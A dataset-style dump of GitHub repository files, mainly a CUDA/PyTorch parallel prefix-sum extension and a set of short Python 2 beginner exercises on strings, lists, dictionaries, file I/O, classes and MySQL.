nltk.TextCollection(docs)\n \n print \"Testing data start\"\n\n for data in test_file:\n title_tokens = nltk.word_tokenize(data[1])\n tokens = re.split(r\"\\W+\", nltk.clean_html(data[2]))\n #tokens = nltk.word_tokenize(nltk.clean_html(data[2]))\n for title_token in title_tokens:\n for i in range(0, 10):\n tokens.append(title_token)\n \n uniqTokens = set(tokens)\n \n tf_idf_scores = {}\n for token in uniqTokens:\n tf_idf_scores[token] = collection.tf_idf(token, tokens)\n\n sorted_tf_idf_scores = sorted(tf_idf_scores.items(), key=lambda x:x[1])\n\n keywords = [ k for k, v in sorted_tf_idf_scores if v > 0.1]\n if len(keywords) <= 0:\n keywords = [ sorted_tf_idf_scores[-1][0] ]\n\n result_file.write(\"%s,\\\"%s\\\"\\n\" % (data[0], \" \".join(keywords)))\n\n \n\n \n" } ]
8
sunyt32/parallel_scan
https://github.com/sunyt32/parallel_scan
02fe3703cfaa6e0ed82170ab63e87e432fe30334
f220ace94e2b4526615f0f23ea47f868d7962e57
081999cbf6fbe8f5b8559289e77c24fad398ad29
refs/heads/master
2023-06-22T11:34:03.610411
2021-07-29T16:37:54
2021-07-29T16:37:54
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.740153431892395, "alphanum_fraction": 0.7636828422546387, "avg_line_length": 38.8979606628418, "blob_id": "62025a37e24613d63fcdb4c35e88af164cae9f3c", "content_id": "40995554a718402c0827749c776aaa8ce8f8e7e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1956, "license_type": "no_license", "max_line_length": 191, "num_lines": 49, "path": "/README.md", "repo_name": "sunyt32/parallel_scan", "src_encoding": "UTF-8", "text": "# Parallel Prefix Sum (Scan) with CUDA \n\n## Pytorch Usage Note\n### Installation\n```\npython setup.py install\n```\n### Usage\n```\nfrom prefix_sum import prefix_sum_cpu, prefix_sum_cuda\n# assuming input is a torch.cuda.IntTensor, num_elements is an integer\n# allocate output_array on cuda\n# e.g. output = torch.zeros((num_elements,), dtype=torch.int, device=torch.device('cuda'))\nprefix_sum_cuda(input, num_elements, output)\n\n# similarly for the CPU version\n# except that both input and output are torch.IntTensor now\nprefix_sum_cpu(input, num_elements, output)\n```\n\n## Original README\n\nMy implementation of parallel exclusive scan in CUDA, following [this NVIDIA paper](http://developer.download.nvidia.com/compute/cuda/1.1-Beta/x86_website/projects/scan/doc/scan.pdf).\n\n>Parallel prefix sum, also known as parallel Scan, is a useful building block for many\nparallel algorithms including sorting and building data structures. In this document\nwe introduce Scan and describe step-by-step how it can be implemented efficiently\nin NVIDIA CUDA. We start with a basic naïve algorithm and proceed through\nmore advanced techniques to obtain best performance. We then explain how to\nscan arrays of arbitrary size that cannot be processed with a single block of threads. \n\nThis implementation can handle very large arbitrary length vectors thanks to the [recursively defined scan function](https://github.com/mattdean1/cuda/blob/master/parallel-scan/scan.cu#L105).\n\nPerformance is increased with a memory-bank conflict avoidance optimization (BCAO).\n\n---\n\nSee the [timings](https://github.com/mattdean1/cuda/blob/master/parallel-scan/Submission.cu#L616) for a performance comparison between:\n 1. Sequential scan run on the CPU\n 2. Parallel scan run on the GPU\n 3. Parallel scan with BCAO\n \nFor a vector of 10 million entries:\n\n\t CPU : 20749 ms\n\t GPU : 7.860768 ms\n\t GPU BCAO : 4.304064 ms\n \n Intel Core i5-4670k @ 3.4GHz, NVIDIA GeForce GTX 760\n" }, { "alpha_fraction": 0.6226071119308472, "alphanum_fraction": 0.6599817872047424, "avg_line_length": 20.52941131591797, "blob_id": "fd1fdf5f5cae7178a7f9fa55331f329434ce20fb", "content_id": "6c9f6e715ad87d80262befbbb626a62b93adcab4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1097, "license_type": "no_license", "max_line_length": 80, "num_lines": 51, "path": "/parallel-scan/utils.cpp", "repo_name": "sunyt32/parallel_scan", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <process.h>\n#include <time.h>\n\n#include \"cuda_runtime.h\"\n\n#include \"utils.h\"\n\nvoid _checkCudaError(const char *message, cudaError_t err, const char *caller) {\n\tif (err != cudaSuccess) {\n\t\tfprintf(stderr, \"Error in: %s\\n\", caller);\n\t\tfprintf(stderr, message);\n\t\tfprintf(stderr, \": %s\\n\", cudaGetErrorString(err));\n\t\texit(0);\n\t}\n}\n\nvoid printResult(const char* prefix, int result, long nanoseconds) {\n\tprintf(\" \");\n\tprintf(prefix);\n\tprintf(\" : %i in %ld ms \\n\", result, nanoseconds / 1000);\n}\n\nvoid printResult(const char* prefix, int result, float milliseconds) {\n\tprintf(\" \");\n\tprintf(prefix);\n\tprintf(\" : %i in %f ms \\n\", result, milliseconds);\n}\n\n\n// from https://stackoverflow.com/a/3638454\nbool isPowerOfTwo(int x) {\n\treturn x && !(x & (x - 1));\n}\n\n// from https://stackoverflow.com/a/12506181\nint nextPowerOfTwo(int x) {\n\tint power = 1;\n\twhile (power < x) {\n\t\tpower *= 2;\n\t}\n\treturn power;\n}\n\n\n// from https://stackoverflow.com/a/36095407\nlong get_nanos() {\n\tstruct timespec ts;\n\ttimespec_get(&ts, TIME_UTC);\n\treturn (long)ts.tv_sec * 1000000000L + ts.tv_nsec;\n}" }, { "alpha_fraction": 0.6482412219047546, "alphanum_fraction": 0.6763818860054016, "avg_line_length": 37.269229888916016, "blob_id": "a00e115ed3139c79431aba869c248d288ba705c6", "content_id": "876faba2001608e6613d657ccbf5316d622bd57d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 995, "license_type": "no_license", "max_line_length": 111, "num_lines": 26, "path": "/test.py", "repo_name": "sunyt32/parallel_scan", "src_encoding": "UTF-8", "text": "import torch\nfrom prefix_sum import prefix_sum_cuda, prefix_sum_cpu\nimport numpy as np\n\ndef test(num_pcs, max_num_grids):\n gpu = torch.device(\"cuda:0\")\n cpu = torch.device(\"cpu\")\n grid_cnt = torch.randint(low=0, high=1000, size=(num_pcs, max_num_grids), dtype=torch.int, device=cpu)\n grid_off = torch.full(size=grid_cnt.shape, fill_value=-1, dtype=torch.int, device=cpu)\n\n # grid_cnt_cuda = torch.randint(low=0, high=1000, size=(num_pcs, max_num_grids), dtype=torch.int, device=gpu)\n grid_cnt_cuda = grid_cnt.cuda()\n grid_off_cuda = torch.full(size=grid_cnt.shape, fill_value=-1, dtype=torch.int, device=gpu)\n\n for i in range(num_pcs):\n num_grids = np.random.randint(low=0, high=max_num_grids)\n prefix_sum_cpu(grid_cnt[i], num_grids, grid_off[i])\n prefix_sum_cuda(grid_cnt_cuda[i], num_grids, grid_off_cuda[i])\n print(grid_off[i, :20])\n print(grid_off_cuda[i, :20])\n\n print(torch.allclose(grid_off, grid_off_cuda.cpu()))\n\n\nif __name__ == \"__main__\":\n test(100, 1000000)\n" }, { "alpha_fraction": 0.668367326259613, "alphanum_fraction": 0.6734693646430969, "avg_line_length": 17.714284896850586, "blob_id": "35c360921951ebe3e866cb033898980e958f007f", "content_id": "e4e8b8ce8c2fba0372fad65471a8f9535335281b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 392, "license_type": "no_license", "max_line_length": 43, "num_lines": 21, "path": "/prefix_sum.h", "repo_name": "sunyt32/parallel_scan", "src_encoding": "UTF-8", "text": "#pragma once\n#include <ATen/ATen.h>\n#include <torch/extension.h>\n\n\nvoid PrefixSumCUDA(\n const at::Tensor grid_cnt,\n int num_grids,\n at::Tensor grid_off);\n\n\nvoid PrefixSumCPU(\n const at::Tensor grid_cnt,\n int num_grids,\n at::Tensor grid_off);\n\n\nPYBIND11_MODULE(TORCH_EXTENSION_NAME, m) {\n m.def(\"prefix_sum_cuda\", &PrefixSumCUDA);\n m.def(\"prefix_sum_cpu\", &PrefixSumCPU);\n}" }, { "alpha_fraction": 0.7672955989837646, "alphanum_fraction": 0.7672955989837646, "avg_line_length": 30.799999237060547, "blob_id": "9f0299d46849c8a351e48eb21d232e78aecb0881", "content_id": "980fe3da602e7f5b654e6399ea71abfb469ce2a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 318, "license_type": "no_license", "max_line_length": 79, "num_lines": 10, "path": "/parallel-scan/utils.h", "repo_name": "sunyt32/parallel_scan", "src_encoding": "UTF-8", "text": "#include \"cuda_runtime.h\"\n\nvoid _checkCudaError(const char *message, cudaError_t err, const char *caller);\nvoid printResult(const char* prefix, int result, long nanoseconds);\nvoid printResult(const char* prefix, int result, float milliseconds);\n\nbool isPowerOfTwo(int x);\nint nextPowerOfTwo(int x);\n\nlong get_nanos();\n" }, { "alpha_fraction": 0.692307710647583, "alphanum_fraction": 0.692307710647583, "avg_line_length": 29, "blob_id": "61eb8c88a92324dd720d499f316f974717b0050e", "content_id": "fee3f3a603d310702cbd78f9ad0d9b0fda416aa9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 780, "license_type": "no_license", "max_line_length": 89, "num_lines": 26, "path": "/setup.py", "repo_name": "sunyt32/parallel_scan", "src_encoding": "UTF-8", "text": "import torch\nimport os\nfrom setuptools import find_packages, setup\nfrom torch.utils.cpp_extension import CUDA_HOME, CppExtension, CUDAExtension\n\nclass BuildExtension(torch.utils.cpp_extension.BuildExtension):\n def __init__(self, *args, **kwargs):\n super().__init__(use_ninja=False, *args, **kwargs)\n\nnvcc_args = []\nnvcc_flags_env = os.getenv(\"NVCC_FLAGS\", \"\")\nif nvcc_flags_env != \"\":\n nvcc_args.extend(nvcc_flags_env.split(\" \"))\n\nextra_compile_args = {}\nextra_compile_args[\"nvcc\"] = nvcc_args\n\nsetup(\n name=\"prefix_sum\",\n author=\"Matt Dean, Lixin Xue\",\n description=\"Parallel Prefix Sum on CUDA with Pytorch API\",\n ext_modules=[\n CUDAExtension('prefix_sum', ['prefix_sum.cu'], extra_compile_args=extra_compile_args)\n ],\n cmdclass={\"build_ext\": BuildExtension},\n)\n" }, { "alpha_fraction": 0.5623237490653992, "alphanum_fraction": 0.6085730195045471, "avg_line_length": 18.932584762573242, "blob_id": "9b02d535acbfa3d36b271ec467a7d1c092f0ac24", "content_id": "61904aef61899087a50dda4bf28da66f20dd0f66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1773, "license_type": "no_license", "max_line_length": 69, "num_lines": 89, "path": "/parallel-scan/Main.cpp", "repo_name": "sunyt32/parallel_scan", "src_encoding": "UTF-8", "text": "#include <stdlib.h>\n#include <stdio.h>\n\n#include <time.h>\n\n#include \"scan.cuh\"\n#include \"utils.h\"\n\nvoid test(int N) {\n\tbool canBeBlockscanned = N <= 1024;\n\n\ttime_t t;\n\tsrand((unsigned)time(&t));\n\tint *in = new int[N];\n\tfor (int i = 0; i < N; i++) {\n\t\tin[i] = rand() % 10;\n\t}\n\n\tprintf(\"%i Elements \\n\", N);\n\n\t\t// sequential scan on CPU\n\t\tint *outHost = new int[N]();\n\t\tlong time_host = sequential_scan(outHost, in, N);\n\t\tprintResult(\"host \", outHost[N - 1], time_host);\n\n\t\t// full scan\n\t\tint *outGPU = new int[N]();\n\t\tfloat time_gpu = scan(outGPU, in, N, false);\n\t\tprintResult(\"gpu \", outGPU[N - 1], time_gpu);\n\t\n\t\t// full scan with BCAO\n\t\tint *outGPU_bcao = new int[N]();\n\t\tfloat time_gpu_bcao = scan(outGPU_bcao, in, N, true);\n\t\tprintResult(\"gpu bcao\", outGPU_bcao[N - 1], time_gpu_bcao);\n\n\t\tif (canBeBlockscanned) {\n\t\t\t// basic level 1 block scan\n\t\t\tint *out_1block = new int[N]();\n\t\t\tfloat time_1block = blockscan(out_1block, in, N, false);\n\t\t\tprintResult(\"level 1 \", out_1block[N - 1], time_1block);\n\n\t\t\t// level 1 block scan with BCAO\n\t\t\tint *out_1block_bcao = new int[N]();\n\t\t\tfloat time_1block_bcao = blockscan(out_1block_bcao, in, N, true);\n\t\t\tprintResult(\"l1 bcao \", out_1block_bcao[N - 1], time_1block_bcao);\n\n\t\t\tdelete[] out_1block;\n\t\t\tdelete[] out_1block_bcao;\n\t\t}\n\n\tprintf(\"\\n\");\n\n\tdelete[] in;\n\tdelete[] outHost;\n\tdelete[] outGPU;\n\tdelete[] outGPU_bcao;\n}\n\nint main()\n{\n\tint TEN_MILLION = 10000000;\n\tint ONE_MILLION = 1000000;\n\tint TEN_THOUSAND = 10000;\n\n\tint elements[] = {\n\t\tTEN_MILLION * 2,\n\t\tTEN_MILLION,\n\t\tONE_MILLION,\n\t\tTEN_THOUSAND,\n\t\t5000,\n\t\t4096,\n\t\t2048,\n\t\t2000,\n\t\t1000,\n\t\t500,\n\t\t100,\n\t\t64,\n\t\t8,\n\t\t5\n\t};\n\n\tint numElements = sizeof(elements) / sizeof(elements[0]);\n\n\tfor (int i = 0; i < numElements; i++) {\n\t\ttest(elements[i]);\n\t}\n\n\treturn 0;\n}" } ]
7
skatara/Python_2.x
https://github.com/skatara/Python_2.x
1b6385b424c58102ed9041289807f13b4e4d58a3
ddc6ee5d0069b56be9f9905893cd876f161c2c8f
9b2a7220f05f07de108922b8829a5fba7c53d685
refs/heads/master
2018-11-03T18:32:06.172198
2018-09-21T12:56:47
2018-09-21T12:56:47
145,430,456
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5736433863639832, "alphanum_fraction": 0.5736433863639832, "avg_line_length": 15.25, "blob_id": "59dd0a15adc531efece18342ff9b24f410e38e37", "content_id": "47a47e844a83407fb6fb53e3f95d19d623e38111", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 129, "license_type": "no_license", "max_line_length": 23, "num_lines": 8, "path": "/Day4/Inheritance/Inher2.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "class A:\n def myprint(self):\n print \"myprint\"\nclass B:\n def display(self):\n print \"display\"\na=A()\na.myprint()" }, { "alpha_fraction": 0.6377952694892883, "alphanum_fraction": 0.6377952694892883, "avg_line_length": 17.14285659790039, "blob_id": "fd36ab31648f0941317e96c509cbf2998fc41fed", "content_id": "4e9b7d35fa3a3562a34f979361e6f52f6d37d6ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 127, "license_type": "no_license", "max_line_length": 44, "num_lines": 7, "path": "/Day5/In_Op/Io11.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=open(\"new file.txt\",\"wr+\")\nb=a.write(raw_input(\"Enter your string : \"))\n\nb=a.read()\nprint b\n\nprint \"file is close\",a.close()\n" }, { "alpha_fraction": 0.5040000081062317, "alphanum_fraction": 0.5680000185966492, "avg_line_length": 9.416666984558105, "blob_id": "0ed6a953c4ee0bfcb11a875c78e4448591a212c3", "content_id": "da94d4c1ac566dcb1a22b4630377dbeb8505519a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 125, "license_type": "no_license", "max_line_length": 21, "num_lines": 12, "path": "/Day2/Number/Num19.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from math import fabs\na=50.1\n'''abs(x)'''\nprint fabs(a)\n\na=-50.1\n'''abs(x)'''\nprint fabs(a)\n\na=50\n'''abs(x)'''\nprint fabs(a)\n" }, { "alpha_fraction": 0.5806451439857483, "alphanum_fraction": 0.6451612710952759, "avg_line_length": 9.666666984558105, "blob_id": "3d3328e75ce0481f33c6330a207d489dd9110698", "content_id": "4e23fd5b128bdc8fa43fa8b7145ad24b83f388a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 31, "license_type": "no_license", "max_line_length": 16, "num_lines": 3, "path": "/Day2/Number/Num4.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10\nb=long(a)\nprint b, type(b)" }, { "alpha_fraction": 0.4523809552192688, "alphanum_fraction": 0.5952380895614624, "avg_line_length": 20.25, "blob_id": "8af189ce617b687f5e4398f030a23f134dc1c005", "content_id": "599eaf88d323a10ff8dc53d64d2708475db0cfc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 84, "license_type": "no_license", "max_line_length": 53, "num_lines": 4, "path": "/Day2/Dictionary/Dict20.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a={'name':'jsi','id':101,'contact':123456,'id':\"102\"}\n\n\nprint \"hello dear %s\"%str(a)" }, { "alpha_fraction": 0.32258063554763794, "alphanum_fraction": 0.5806451439857483, "avg_line_length": 15, "blob_id": "ac8b376838b58575d787481ca161cdbcf973c3b2", "content_id": "763e745e353c00220c2211c4c99ab5405a2df663", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 31, "license_type": "no_license", "max_line_length": 18, "num_lines": 2, "path": "/Day2/Tuple/Tup2.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=(10,20,30,'hey')\nprint a[0:3]" }, { "alpha_fraction": 0.7735849022865295, "alphanum_fraction": 0.7735849022865295, "avg_line_length": 17, "blob_id": "31df37b4ba51519ba85a4dec12c193bb9d260922", "content_id": "be2e6c489d1da03cb7009b23d620eff5fcd33f7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 53, "license_type": "no_license", "max_line_length": 25, "num_lines": 3, "path": "/Vikas/B/Bfile.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from Vikas.A import afile\nafile.display()\nafile.dis()" }, { "alpha_fraction": 0.5416666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 7.333333492279053, "blob_id": "19f7a16288cf3320ce75a242104259e1e7951207", "content_id": "f2f89692d85ace4dccc33cb3d7ae6f00ec9e413e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24, "license_type": "no_license", "max_line_length": 8, "num_lines": 3, "path": "/Day2/Number/Num15.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10+5j\nb=int(a)\nprint b" }, { "alpha_fraction": 0.8153846263885498, "alphanum_fraction": 0.8153846263885498, "avg_line_length": 21, "blob_id": "6a08e2b3ae8959272ecb72bcb989789f2e079053", "content_id": "0263fd810d0632750c8019e5b4a6b3716856c2e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 65, "license_type": "no_license", "max_line_length": 29, "num_lines": 3, "path": "/Day2/String/String11.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from string import capitalize\na=\"hello world\"\nprint capitalize(a)" }, { "alpha_fraction": 0.6975945234298706, "alphanum_fraction": 0.7113401889801025, "avg_line_length": 25.545454025268555, "blob_id": "6a4fe6f9765225d7ad30befdc03b5102a22ac6bd", "content_id": "47290a43af22a7ba706d96c244fdbdf67ca4b299", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 291, "license_type": "no_license", "max_line_length": 77, "num_lines": 11, "path": "/Day5/Database/mysqlDB/Db9.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import mysql.connector\n'''create database table'''\nmydata=mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"root\",\n database=\"SAVANJI\"\n )\ncursor=mydata.cursor()\ncursor.execute(\"CREATE TABLE student (name VARCHAR(25),address VARCHAR(25))\")\nprint cursor" }, { "alpha_fraction": 0.4336283206939697, "alphanum_fraction": 0.5752212405204773, "avg_line_length": 21.399999618530273, "blob_id": "9f76176dc8af8eac1044aea77b7b563c9162968b", "content_id": "f2d3880c19651ec4072bf3e85f9fc5a217257e20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 113, "license_type": "no_license", "max_line_length": 24, "num_lines": 5, "path": "/Day2/Number/Num25.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "\na=(10,20,30,40,'python')\nb=(10,20,30,40,'hello')\nprint \" min(a)\",min(a)\nprint \" max(a)\",max(a)\nprint cmp(b, a)\n" }, { "alpha_fraction": 0.38461539149284363, "alphanum_fraction": 0.5692307949066162, "avg_line_length": 15.5, "blob_id": "c2e39d13f1ca7c148acd61e4fc9f3deee2ebcd93", "content_id": "68cd88c26227ed4e3786a35d3d332604d3b5c6a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 65, "license_type": "no_license", "max_line_length": 55, "num_lines": 4, "path": "/Day2/Dictionary/Dict15.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a={['name']:'jsi','id':101,'contact':123456,'id':\"102\"}\n\n\nprint a" }, { "alpha_fraction": 0.43396225571632385, "alphanum_fraction": 0.6226415038108826, "avg_line_length": 12.5, "blob_id": "ab09e563e2296a55577e14d46767ac5373d51101", "content_id": "48d85f543d64c9fe400ce0f74f845c6ee17a5f40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 53, "license_type": "no_license", "max_line_length": 25, "num_lines": 4, "path": "/Day2/List/List7.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=[10,20,50.5,'hey',500L]\nb=\"py\"\nprint min(a)\nprint a" }, { "alpha_fraction": 0.4444444477558136, "alphanum_fraction": 0.6296296119689941, "avg_line_length": 10, "blob_id": "2560661aadff9cbffc32791087116679d5a057a6", "content_id": "f5542d20f352d33ba923d2aec0302614df86e80e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 54, "license_type": "no_license", "max_line_length": 25, "num_lines": 5, "path": "/Day2/List/List6.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=[10,20,50.5,'hey',500L]\nb=\"py\"\nprint a\ndel a\nprint a" }, { "alpha_fraction": 0.738095223903656, "alphanum_fraction": 0.738095223903656, "avg_line_length": 20.25, "blob_id": "36972ab12df4f9e239b34a1796e2b9a46718d585", "content_id": "e87243544eeb5df4ade455e33b4d7827418388b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 84, "license_type": "no_license", "max_line_length": 39, "num_lines": 4, "path": "/Day5/Test_2_speech/TTS1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import pyttsx\na=pyttsx.init()\na.say(\"hey python how are you my jaan\")\na.runAndWait()" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 12.5, "blob_id": "4f35fe0676ddee3942529fb4669ac53412a8ccb5", "content_id": "c685b9344c8854fc5dc1e0888a66e28d8d2903f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 55, "license_type": "no_license", "max_line_length": 24, "num_lines": 4, "path": "/Day5/In_Op/Io6.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "\na=open(\"myfile.txt\",\"r\")\nb=a.read()\nprint b\na.close()\n" }, { "alpha_fraction": 0.4153846204280853, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 12.199999809265137, "blob_id": "3dc5203fd1169cdd34594d807630c42d90d87b8f", "content_id": "759a8f5dcc83f18ac8b7c164d92639887cd68327", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 65, "license_type": "no_license", "max_line_length": 25, "num_lines": 5, "path": "/Day2/List/List4.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=[10,20,50.5,'hey',500L]\nb=\"py\"\nprint a[2]\na[2]=\"python\"\nprint a" }, { "alpha_fraction": 0.6060606241226196, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 10.333333015441895, "blob_id": "76ed74f854b17cec973a12de9af4000be9524bbf", "content_id": "2585f395e1164f0e0cec3a1b4d3e47dbe587db3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 33, "license_type": "no_license", "max_line_length": 16, "num_lines": 3, "path": "/Day2/Number/Num10.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10L\nb=float(a)\nprint b, type(b)" }, { "alpha_fraction": 0.6158192157745361, "alphanum_fraction": 0.6158192157745361, "avg_line_length": 20.875, "blob_id": "4824bccf4e64d0a9898a1f6a7abd677f8658db53", "content_id": "0f0ad47fe36ccf7e7a492c62c12fde1c7c54bfbc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 177, "license_type": "no_license", "max_line_length": 44, "num_lines": 8, "path": "/Day5/Exception/Excep5.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "try:\n a=open(\"test.txt\",\"w\")\n a.write(\"hey this is java\")\nexcept:\n print \"cant not file and write the file\"\nelse:\n print \"file is succesfully write\"\n a.close() " }, { "alpha_fraction": 0.625, "alphanum_fraction": 0.625, "avg_line_length": 15, "blob_id": "48be03a863f95f7b2fb0333d8ff8a00000ccb954", "content_id": "aba237555425860361c21d2c9c85faccf3e42548", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 80, "license_type": "no_license", "max_line_length": 31, "num_lines": 5, "path": "/Day5/In_Op/Io10.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=open(\"new file.txt\",\"r+\")\nb=a.read()\nprint b\n\nprint \"file is close\",a.close()\n" }, { "alpha_fraction": 0.6538461446762085, "alphanum_fraction": 0.6730769276618958, "avg_line_length": 12.25, "blob_id": "cd3528ba6f7ee3e632d2c3423a8f13ac85af2cfd", "content_id": "465a723e5b685484ff25390fa1e85da14778b2db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 52, "license_type": "no_license", "max_line_length": 20, "num_lines": 4, "path": "/Day5/In_Op/OS/os2.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import os\n#a=os.mkdir(\"os1/a\")\nb=os.getcwd()\nprint b" }, { "alpha_fraction": 0.5914633870124817, "alphanum_fraction": 0.7560975551605225, "avg_line_length": 19.375, "blob_id": "73ceb29195ad35016057a79db429d20950ef52fa", "content_id": "cc78eded1db98825093b494602ef92ec25dae383", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 164, "license_type": "no_license", "max_line_length": 32, "num_lines": 8, "path": "/Day2/Number/Random.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import random\na=20\nprint random.random()\nprint random.choice([10,20,30])\nprint random.randrange(10,100,5)\nlist1=[10,20,30,40,50]\nrandom.shuffle(list1)\nprint list1\n\n" }, { "alpha_fraction": 0.574999988079071, "alphanum_fraction": 0.6499999761581421, "avg_line_length": 39.5, "blob_id": "2bc21573c424d66a1f89f0c269a11ab0cfdef8cb", "content_id": "4962173b2a7358be820155edc985fa771cc59974", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 80, "license_type": "no_license", "max_line_length": 64, "num_lines": 2, "path": "/Day2/String/String8.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=\"hello world\"\nprint \"hey %s. tell me ur contact number %d : \"%('mark',123456)" }, { "alpha_fraction": 0.5502392053604126, "alphanum_fraction": 0.5502392053604126, "avg_line_length": 12.933333396911621, "blob_id": "36635ce2dba20016591742162aa4ecd1025d4f25", "content_id": "18932a72ae4976de42ab38c11d95dd8666bd79ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 209, "license_type": "no_license", "max_line_length": 23, "num_lines": 15, "path": "/Day4/Inheritance/Inher4.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "class A:\n def myprint(self):\n print \"myprint\"\nclass B(A):\n def display(self):\n print \"display\"\n\nclass C(B):\n def show(self):\n print \"show\"\n\nc=C()\nc.myprint()\nc.display()\nc.show()\n" }, { "alpha_fraction": 0.6463414430618286, "alphanum_fraction": 0.6463414430618286, "avg_line_length": 10.571428298950195, "blob_id": "8e3b1c7de17c64d06bc2a32f9c02f8b6bd553163", "content_id": "e1b315ea714eb8bc767cfb03658b4cc4738c21b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 82, "license_type": "no_license", "max_line_length": 24, "num_lines": 7, "path": "/Day5/In_Op/Io8.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "\na=open(\"myfile.txt\",\"r\")\nb=a.read()\nprint a.mode\nprint a.name\n\nprint b\na.close()\n" }, { "alpha_fraction": 0.7755101919174194, "alphanum_fraction": 0.7755101919174194, "avg_line_length": 11.5, "blob_id": "cda77c452f655564b57bda73668af8e5a3e755f8", "content_id": "8b4620b1054a83e518664dbc986a87693ab58094", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 49, "license_type": "no_license", "max_line_length": 17, "num_lines": 4, "path": "/Day3/Module/mytest.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import Phone\nPhone.musicplay()\nPhone.msg()\nPhone." }, { "alpha_fraction": 0.6351351141929626, "alphanum_fraction": 0.6351351141929626, "avg_line_length": 23.33333396911621, "blob_id": "208461a4fc153e9834daa2b13c7b43c5c818971c", "content_id": "92c247f328b397b91f17d01389269769f12ac17b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 74, "license_type": "no_license", "max_line_length": 35, "num_lines": 3, "path": "/Day5/In_Op/Io5.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "\na=open(\"myfile.txt\",\"wr+\")\na.write(\"Enter your String data: \")\na.close()\n" }, { "alpha_fraction": 0.5454545617103577, "alphanum_fraction": 0.6363636255264282, "avg_line_length": 10.333333015441895, "blob_id": "a264cc895b86376952e49e0018b2b26d22f86c95", 